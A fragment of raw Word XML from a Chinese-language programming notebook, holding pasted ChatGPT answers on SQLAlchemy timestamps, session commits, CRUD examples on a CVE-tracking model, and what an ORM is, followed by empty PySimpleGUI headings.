      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    update_time = Column(DateTime, default=func.now(), onupdate=func.now())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71401821" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42EAAF5C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个例子中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>update_time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段在数据行被创建时会被赋予当前时间戳，当数据行被更新时，它的值也会被更新为当前时间戳。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4056428D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4843E4CD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，你需要在你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQLAlchemy Session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提交变动时使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session.commit()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，以触发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>onupdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项。如果你只是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session.flush()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>onupdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不会被触发。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAD748C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E1A1A64" w14:textId="6C5D0429" w:rsidR="00A36DC7" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>另外，如果你的数据库支持，你也可以直接在数据库端设置这个选项，这样无论通过什么方式修改数据，都会自动更新时间戳。但是如何设置取决于你具体使用的数据库系统和数据库接口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD9D809" w14:textId="77777777" w:rsidR="00B5111D" w:rsidRDefault="00B5111D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DDD2E56" w14:textId="6C0F7142" w:rsidR="00B5111D" w:rsidRDefault="00B5111D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="601" w:name="_Toc159780034"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>hatGPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>回答</w:t>
      </w:r>
      <w:bookmarkEnd w:id="601"/>
    </w:p>
    <w:p w14:paraId="160609F2" w14:textId="77777777" w:rsidR="00B5111D" w:rsidRDefault="00B5111D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45B82851" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中定义表结构的常用方式。在这个代码中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DBPoc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的模型，它代表了数据库中的一个表。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">__tablename__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是表名，而每一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Column() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例是表中的一个字段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EF83EB" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33A495B4" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Column() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数用于定义字段和字段的类型，可以接受许多参数以设置字段的属性，如是否为主键（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>primary_key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）、是否能为空（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nullable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）、默认值（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）等。例如，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Column(Integer, primary_key=True) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就表示该字段的类型是整数，并且是主键。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0FF13B" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AA65248" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个模型的实例就对应着表中的一行数据。因此，你可以通过操作这个对象来对数据进行增删改查。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AF5291" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55FF90A4" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485CC91B" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A9BEF5F" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个新的记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3ACBD4" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>new_poc = DBPoc(eid=1, cve='CVE-2021-1234', ...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AA6652" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>session.add(new_poc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79243D9D" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>session.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5CAA77" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44048FF1" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E12DC00" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>pocs = session.query(DBPoc).filter(DBPoc.cve == 'CVE-2021-1234').all()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348EE8D5" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6986FE88" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADF885C" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>poc = session.query(DBPoc).filter(DBPoc.id == 1).first()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7F3345" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>poc.cve = 'CVE-2021-5678'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DED606" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>session.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC59D0B" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="712661F2" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68886E88" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>poc = session.query(DBPoc).filter(DBPoc.id == 1).first()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55054DB8" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>session.delete(poc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47835E6A" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>session.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C9E8CB" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF476E1" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，所有的数据库操作都需要在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的上下文中进行，并且在完成操作后，需要调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> commit() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法来提交更改。如果你忘记了调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> commit()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那么更改将不会被保存到数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26818C5A" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F220DA" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个强大的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具，提供了丰富的功能，你可以在官方文档中了解更多：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">https://docs.sqlalchemy.org/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE321F7" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9AC13E" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是什么意思</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F4506D" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBE2477" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6889ABEA" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Object-Relational Mapping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（对象关系映射）的简称，它是一种程序设计技术，用于实现面向对象编程语言里的对象与关系数据库的数据之间的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0495232D" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68732FCA" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在编程过程中，我们经常需要处理两种不同类型的系统：面向对象的系统（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等编程语言）和关系型数据库（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等）。这两种系统在处理数据的方式上有很大的差异。面向对象的系统中，数据是以对象的形式存在的，对象可以有属性（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和方法（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。而在关系型数据库中，数据以表格的形式存储，表格中的每一行就是一条记录，每一列就是一个字段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FD4C4C" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0164D961" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了解决这两种系统之间的冲突，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术被发明出来。它允许我们在面向对象编程语言中使用类和对象的方式来操作数据库，而不需要直接编写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的帮助下，一个类对应数据库中的一个表，类的一个实例对应表中的一条记录，类的属性对应表的字段，这样就建立了对象和关系之间的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F40295" w14:textId="77777777" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B8BA3F1" w14:textId="7013C546" w:rsidR="005200AC" w:rsidRDefault="005200AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具有许多优点，例如，可以提高开发效率，代码更加简洁，可读性更强，更容易维护。同时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具也通常提供了一些高级功能，如事务管理、懒加载、缓存等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C91D5D4" w14:textId="77777777" w:rsidR="00B5111D" w:rsidRDefault="00B5111D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C0F68C3" w14:textId="77777777" w:rsidR="00B5111D" w:rsidRDefault="00B5111D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E8C18E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="602" w:name="_Toc159780035"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图形化：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PySimpleGUI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="602"/>
    </w:p>
    <w:p w14:paraId="4FA32550" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40DB4308" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A762FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E8DA95A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="603" w:name="_Toc159780036"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图形化：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
